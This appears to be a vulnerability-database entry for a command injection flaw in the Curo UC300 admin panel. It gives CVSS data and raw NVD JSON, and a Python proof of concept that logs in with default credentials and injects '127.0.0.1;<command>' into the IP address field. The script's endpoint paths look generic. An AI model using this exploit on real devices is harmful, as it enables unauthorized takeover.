Security Vulnerability Report
CVE-2025-57457 CVSS 8.8 HIGH

CVE-2025-57457

Published: 2025-10-08 19:15:45
Last Modified: 2026-04-15 00:35:42

Description

An OS Command Injection vulnerability in the Admin panel in Curo UC300 5.42.1.7.1.63R1 allows local attackers to inject arbitrary OS Commands via the "IP Addr" parameter.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Note: the vector scores the attack vector as Network (AV:N, with low privileges required), while the description above says "local attackers"; the two sources on this page disagree on that point.

Configurations (Affected Products)

No CPE configuration data is available for this CVE. The affected product, as stated in the description, is:

Curo UC300 5.42.1.7.1.63R1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57457 - Curo UC300 OS Command Injection PoC
# Vulnerability: OS Command Injection via "IP Addr" parameter in Admin Panel
# Affected: Curo UC300 5.42.1.7.1.63R1

import requests
import sys

TARGET_URL = "http://target-curo-uc300"
ADMIN_PATH = "/admin"
USERNAME = "admin"
PASSWORD = "password"


def exploit(target, cmd):
    """Exploit OS command injection via IP Addr parameter"""
    session = requests.Session()

    # Step 1: Login to admin panel
    login_url = f"{target}{ADMIN_PATH}/login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    resp = session.post(login_url, data=login_data)
    if resp.status_code != 200:
        print("[!] Login failed")
        return
    print("[*] Logged in successfully")

    # Step 2: Inject command via IP Addr parameter
    # Payload format: <valid_ip>;<command>
    payload = f"127.0.0.1;{cmd}"
    inject_url = f"{target}{ADMIN_PATH}/network/settings"
    inject_data = {
        "ip_addr": payload,
        "action": "save"
    }
    resp = session.post(inject_url, data=inject_data)
    print(f"[*] Payload sent: {payload}")
    print(f"[*] Response status: {resp.status_code}")
    return resp.text


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url> [command]")
        print(f"Example: {sys.argv[0]} http://192.168.1.100 'id'")
        sys.exit(1)
    target = sys.argv[1]
    cmd = sys.argv[2] if len(sys.argv) > 2 else "id"
    result = exploit(target, cmd)
    if result:
        print(f"[*] Response:\n{result}")

References

http://curo.com
https://github.com/restdone/CVE-2025-57457/tree/main

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-57457",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-08T19:15:44.563",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An OS Command Injection vulnerability in the Admin panel in Curo UC300 5.42.1.7.1.63R1 allows local attackers to inject arbitrary OS Commands via the \"IP Addr\" parameter."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "http://curo.com",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/restdone/CVE-2025-57457/tree/main",
        "source": "[email protected]"
      }
    ]
  }
}